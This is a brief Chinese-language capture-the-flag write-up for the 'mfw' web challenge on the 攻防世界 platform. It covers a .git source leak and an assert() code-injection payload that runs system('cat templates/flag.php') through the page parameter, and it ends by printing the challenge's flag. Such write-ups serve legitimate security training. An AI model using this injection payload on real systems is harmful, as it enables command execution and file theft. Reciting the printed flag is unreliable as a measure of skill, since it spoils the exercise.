攻防世界web进阶区之mfw
打开题目所给链接:首先查看源码,会发现这个但访问之后没什么用。我们点开About
会发现它似乎存在git源码泄露,访问/.git/抓包后发现flag.php但对解题没什么作用,我们查看index.php看是否能找到猫腻我们利用assert命令执行来查看flag的内容 payload:?page=1’,‘2’) === false and system(‘cat templates/flag.php’) and strpos('templates/flag ,查看源码即可得到flag
cyberpeace{cdc942501e0ef5f30fa7e8169e826dbb}